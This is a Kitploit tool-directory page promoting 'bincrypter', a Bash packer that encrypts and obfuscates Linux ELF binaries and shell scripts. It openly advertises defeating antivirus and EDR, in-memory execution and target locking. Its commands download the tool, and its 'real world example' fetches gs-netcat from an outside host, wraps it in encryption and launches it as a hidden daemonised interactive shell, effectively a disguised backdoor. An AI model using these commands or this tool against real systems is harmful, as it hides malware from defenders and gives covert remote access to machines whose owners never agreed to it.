Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
bincrypter — Pack/Encrypt/Obfuscate ELF + SHELL scripts | Kitploit
Tools/GitHubGitHub/hackerschoice/bincrypter
Encryption/Decryption ToolsPayload GenerationReverse EngineeringMalware AnalysisBinary Analysis
GitHubhackerschoice/bincrypter

bincrypter

Pack/Encrypt/Obfuscate ELF + SHELL scripts

View Repository
4556035 months agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Privacy and copyright protection for your programs

A Linux Binary Runtime Crypter - in BASH!

  • Obfuscate & encrypt any ELF binary
  • Obfuscate & encrypt any SHELL-script
  • AV/EDR death: Morphing + different signature every time
  • 100% in-memory. No temporary files
  • Not soiling the filesystem
  • Double or triple encrypt the same binary (or itself)
  • Resulting binary is heavily obfuscated (string only shows garbage)
  • Living off the Land (LotL): Only needs /bin/sh + perl + openssl
  • Architecture agnostic: Works on x86_64, aarch64, arm6, mips, ...
  • Lock a binary to a target system and make it fail to run anywhere else.

exmaple

Download:

root@kitploit:~
curl -SsfL https://github.com/hackerschoice/bincrypter/releases/latest/download/bincrypter -o bincrypter
chmod +x bincrypter
./bincrypter -h

Example:

root@kitploit:~
cp /usr/bin/id id
./bincrypter id
# Compressed: 68552 --> 24176 [35%]

./id
# uid=0(root) gid=0(root) groups=0(root)

Set a custom PASSWORD (optionally):

root@kitploit:~
cp /usr/bin/id id
./bincrypter id foobar
# Compressed: 68552 --> 23860 [34%]

./id
# Enter Password: foobar
# uid=0(root) gid=0(root) groups=0(root)

Real world example:

root@kitploit:~
curl -SsfL "https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)" | PASSWORD="foobar" ./bincrypter  >gsnc
chmod +x gsnc
PASSWORD="foobar" GS_ARGS="-ilD -s ChangeMe" ./gsnc

Other great work:
https://github.com/guitmz/ezuri
https://github.com/upx/upx
https://bitlackeys.org/#sherlocked


Join the fun: https://thc.org/ops
bsky: @hackerschoice.bsky.social
Mastodon: @[email protected]

Download Tool